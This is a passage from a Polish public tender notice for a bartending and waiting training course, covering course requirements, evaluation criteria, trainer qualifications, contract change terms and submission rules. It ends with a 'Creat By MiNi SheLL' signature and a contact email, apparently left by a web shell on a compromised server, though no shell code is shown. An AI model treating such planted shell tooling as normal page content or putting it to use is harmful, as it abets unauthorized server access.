w szczególności naczynia, niezbędne urządzenia do sporządzania napojów oraz odpowiedni program szkolenia z zakresu barmana, rodzaj i ilość trunków, soków, napojów, owoców oraz elementów dekoracyjnych - każdy uczestnik szkolenia powinien mieć swobodny dostęp do sprzętu, akcesoriów i materiałów szkoleniowych.<br/>m)	Zamawiający wymaga, aby Wykonawca prowadził kurs na profesjonalnym mobilnym barze.<br/>n)	Kurs zostanie zakończony egzaminem zewnętrznym końcowym (certyfikacyjnym). Wykonawca w ramach wynagrodzenia będzie zobowiązany zorganizować i przeprowadzić egzamin certyfikacyjny dla wszystkich uczestników kursu. <br/>o)	Wykonawca w ramach realizacji zamówienia, zapewni każdemu uczestnikowi kursu jedno podejście do egzaminu certyfikacyjnego oraz wyda certyfikat wszystkim osobom, które pomyślnie zdały egzamin.<br/>p)	Po ukończeniu kursu uczestnicy otrzymają dokumenty potwierdzające jego ukończenie - zaświadczenie o którym mowa w §12 ust. 2 rozporządzenia Ministra Edukacji Narodowej z dnia 19 marca 2019 roku w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2019 r., poz. 652).<br/>q)	Zamawiający wymaga aby zajęcia były przeprowadzone w formie teoretyczno-praktycznej (wykłady, warsztaty praktyczne, dyskusja), zgodnie z harmonogramem i zaakceptowanym przez Zamawiającego programem szkolenia.<br/>r)	Zamawiający wymaga wydania przez Wykonawcę Zaświadczenia ukończenia kursu uprawniającego do wykonywania zawodu Barmana potwierdzającego nabycie przez uczestników/uczestniczki kwalifikacji zawodowych na podstawie wyników egzaminów zewnętrznych.<br/>5.	Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych w projektowanym wzorze umowy stanowiącym Załącznik nr 4 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80530000-8 - Usługi szkolenia zawodowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80500000-9 - Usługi szkoleniowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>„Łączna cena oferty brutto” – C<br/>„Dodatkowe doświadczenie trenera/instruktora (wskazanego na spełnienie warunku udziału w postępowaniu)” – D</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie trenera/instruktora (wskazanego na spełnienie warunku udziału w postępowaniu)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca spełni warunek w zakresie zdolności technicznej lub zawodowej, jeżeli wykaże, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonaniu zamówienia i posiadają kwalifikacje i doświadczenie wskazane poniżej:<br/>Część 1<br/>1 osoba - pełniąca funkcję instruktora/trenera,<br/>	posiadająca wykształcenie wyższe II stopnia (magisterskie),<br/>	posiadająca ukończony kurs pedagogiczny lub tytuł magistra pedagogiki,<br/>	posiadająca doświadczenie zawodowe tj. w okresie ostatnich 4 lat przeprowadziła min. 21 kursów z tematyki kelnerskiej, każdy trwający min. 8 godz. dla grupy min. 8 osób<br/><br/>1 osoba - pełniąca funkcję instruktora/trenera,<br/>	posiadająca wykształcenie wyższe magisterskie,<br/>	posiadająca ukończony kurs pedagogiczny lub tytuł magistra pedagogiki,<br/>	posiadająca doświadczenie zawodowej, tj. w okresie ostatnich 4 lat przeprowadziła minimum 21 kursów z tematyki barmańskiej, trwających minimum 8 godzin dla grupy minimum 8 osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, o których mowa powyżej wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.<br/>Wykaz osób przygotowany wg Załącznika nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty należy dołączyć:<br/>1. Pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik.<br/>2. Pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia - dotyczy ofert składanych przez<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania, wzór stanowi<br/>Załącznik nr 2 do SWZ. W przypadku wspólnego ubiegania się o zamówienie przez<br/>Wykonawców, oświadczenie o niepoleganiu wykluczeniu składa każdy z Wykonawców.<br/>4. Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu, wzór stanowi<br/>Załącznik nr 3 do SWZ.<br/>5 Zobowiązanie podmiotu udostępniającego zasoby, na które powołuje się Wykonawca, celem<br/>spełnienia warunków udziału w postępowaniu.<br/>6. Oświadczenie, zgodne z art. 117 ust 4 ustawy Pzp (dot. Wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia) wskazujące, które usługi wykonają poszczególni Wykonawcy<br/>(oświadczenie wg wzoru Wykonawcy).<br/>7. Dokumenty na potwierdzenie informacji/parametrów wskazanych w Kryterium oceny ofert<br/>(jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, konsorcjum<br/>Wykonawców dokumenty wymienione w pkt VIb ppkt 4.1. SWZ składa ten Wykonawca, członek<br/>konsorcjum, który wykazuje spełnienie odpowiedniego warunku udziału w postępowaniu.<br/>Oznacza to, że Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, konsorcjum<br/>Wykonawców, wykazują spełnienie warunków:<br/>a) przez jednego Wykonawcę – w zakresie posiadania osoby do realizacji zamówienia i/lub<br/>doświadczenia,<br/>lub<br/>b) łącznie przez 2 lub więcej Wykonawców/łącznie przez wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>Ponadto, zgodnie z art. 117 ust 4 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia, dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni Wykonawcy (oświadczenie wg wzoru Wykonawcy).<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie:<br/>-o niepodleganiu wykluczeniu składa każdy z Wykonawców, oraz podmiot trzeci na którego<br/>potencjał powołuje się Wykonawca,<br/>- o spełnieniu warunków udziału w postępowaniu składa Wykonawca/Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, który/którzy spełnia/ją dany warunek w postępowaniu<br/>oraz podmiot trzeci (jeżeli dotyczy), na którego potencjał powołuje się Wykonawca <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiana postanowień niniejszej umowy wymaga formy pisemnej w postaci aneksu, pod rygorem nieważności.<br/><br/>2.	Zmiana umowy dokonana z naruszeniem art. 455 ustawy Prawo Zamówień Publicznych jest nie dopuszczalna. <br/><br/>3.	Strony przewidują możliwość zmiany umowy w następujących sytuacjach:<br/>a)	termin realizacji przedmiotu zamówienia może ulec przesunięciu z powodu wystąpienia Siły wyższej, rozumianej, jako pożar, powódź, huragan, eksplozję, awarie energetyczne, wojnę, operacje wojskowe, rozruchy, niepokoje społeczne, ograniczenia i zakazy wydane przez organy administracji publicznej, a także inne nadzwyczajne zjawiska losowe i przyrodnicze, wszystkie z nich pozostające poza kontrolą Stron, których nie można było przewidzieć w chwili zawarcia umowy, a jeżeli możliwe były do przewidzenia nie można było im zapobiec, o ile te miały wpływ na opóźnienie;<br/>- Przedłużenie terminu wykonania zamówienia z przyczyny wskazanej wyżej, może nastąpić wyłącznie o czas trwania przeszkody.<br/>b)	zmiana polegająca na:<br/><br/>1.	dopuszczeniu do wykonywania części zamówienia (zakresu zamówienia) podwykonawcy, który nie został wskazany w ofercie;<br/>2.	dopuszczeniu do wykonywania przez podwykonawców tej części zamówienia (zakresu zamówienia), która nie została wskazana w ofercie do podzlecenia,<br/>po wcześniejszej akceptacji przez Zamawiającego (zmiana niewymagająca sporządzania aneksu),<br/><br/>c)	zmiana albo rezygnacja z Podwykonawcy, na zasoby którego Wykonawca powoływał się na zasadach określonych w art. 118 ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu pod warunkiem że Wykonawca wykaże Zamawiającemu, iż proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia powyższe warunki udziału w postępowaniu w stopniu nie mniejszym niż podwykonawca na za zasoby którego wykonawca powoływał się w trakcie prowadzonego postępowania. (zmiana niewymagająca sporządzania aneksu);<br/>d)	przewiduje się możliwość dokonania zmian w umowie dotyczącej zmniejszenia liczby uczestników szkolenia w przypadku wystąpienia okoliczności nie zależnych i niezawinionych przez Zamawiającego, których nie można było przewidzieć w chwili zawarcia umowy, a powodujących, że wykonanie zamówienia nie jest możliwe w liczbie określonej przez Wykonawcę.<br/>e)	przewiduje się możliwość dokonania zmian osób które będą uczestniczyć w wykonywaniu zamówienia. Zmiany można dokonać, gdy wynikają one z przyczyn losowych, całkowicie niezależnych od Wykonawcy, ze względów zdrowotnych, rodzinnych lub zawodowych. Ponadto osoby wyznaczone w ramach zmiany do realizacji zamówienia muszą posiadać wykształcenie, kwalifikacje zawodowe i doświadczenie równe lub większe od wykształcenia, kwalifikacji zawodowych i doświadczenia osoby lub osób wyszczególnionych w ofercie Wykonawcy.<br/>4.	Żadnej ze stron Umowy nie przysługuje roszczenie o zawarcie aneksu (obie strony muszą wyrazić zgodę na zawarcie aneksu). <br/>5.	Niezależnie od powyższego, Strony dopuszczają możliwość zmian redakcyjnych Umowy, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, Strony wprowadzą do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości Stron oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. <br/>6.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany:<br/> a) danych związanych z obsługą administracyjno-organizacyjną Umowy,<br/> b) danych teleadresowych, <br/> c) danych rejestrowych,<br/> d) będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-20 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiatkamienski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-20 12:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający wymaga, aby Wykonawca lub Podwykonawca przy realizacji przedmiotu Umowy zatrudniał na umowę o pracę w rozumieniu przepisów Kodeksu Pracy, osoby wykonujące poniżej wskazane czynności:<br/>-	prace biurowe związane z obsługą realizowanego zamówienia,<br/>jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art.22 §1 ustawy z dnia 26.06.1974 r – Kodeks pracy (Dz. U. z 2020 r., poz. 1320 ze zm.).<br/>2. B) 1. Oferta musi być sporządzona w języku polskim, w postaci elektronicznej i opatrzona kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym. Oznacza to, że do przygotowania oferty konieczne jest<br/>posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu<br/>osobistego lub podpisu zaufanego.<br/>2. Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 ustawy Pzp, pełnomocnictwa, przedmiotowe środki dowodowe<br/>sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach<br/>rekomendowanych przez Zamawiającego: .pdf .doc .docx .xls .xlsx .jpg (.jpeg) ze szczególnym wskazaniem na .pdf.. Ofertę,<br/>a także oświadczenie o jakim mowa w rozdziale VIb pkt 1 i 2 SWZ składa się pod rygorem nieważności, w formie<br/>elektronicznej tj. podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonym podpisem<br/>zaufanym lub podpisem osobistym.<br/>3. Wszelkie informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu<br/>nieuczciwej konkurencji (Dz. U. z 2019 r. poz. 1010), które Wykonawca zastrzeże jako tajemnicę przedsiębiorstwa, powinny<br/>zostać złożone zgodnie z opisem na Platformie w folderze Instrukcje dla Wykonawcy. Wykonawca zobowiązany jest, wraz z<br/>przekazaniem tych informacji, wykazać spełnienie przesłanek określonych w art. 11 ust. 2 ustawy z dnia 16 kwietnia 1993 r.<br/>o zwalczaniu nieuczciwej konkurencji. Zaleca się, aby uzasadnienie zastrzeżenia informacji jako tajemnicy przedsiębiorstwa<br/>było sformułowane w sposób umożliwiający jego udostępnienie. Zastrzeżenie przez Wykonawcę tajemnicy przedsiębiorstwa<br/>bez uzasadnienia, będzie traktowane przez Zamawiającego jako bezskuteczne ze względu na zaniechanie przez<br/>Wykonawcę podjęcia niezbędnych działań w celu zachowania poufności objętych klauzulą informacji zgodnie z<br/>postanowieniami art. 18 ust. 3 pzp.<br/>4. Do przygotowania oferty zaleca się wykorzystanie Formularza Oferty, którego wzór stanowi Załącznik nr 1 do SWZ. W<br/>przypadku, gdy Wykonawca nie korzysta z przygotowanego przez Zamawiającego wzoru, w treści oferty należy zamieścić<br/>wszystkie informacje wymagane w Formularzu Oferty.<br/>C) Dodatkowe przesłanki wykluczenia<br/>Zgodnie z art. 1 pkt 3 ustawy w celu przeciwdziałania wspieraniu agresji Federacji Rosyjskiej na Ukrainę rozpoczętej w dniu<br/>24 lutego 2022 r., wobec osób i podmiotów wpisanych na listę, o której mowa w art. 2 ustawy, stosuje się sankcje<br/>polegające m.in. na wykluczeniu z postępowania o udzielenie zamówienia publicznego lub konkursu prowadzonego na<br/>podstawie ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2021 r. poz. 1129, z późn. zm.),<br/>zwanej dalej „ustawą Pzp”.<br/>A-C) Pozostałe informacje zawarto w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com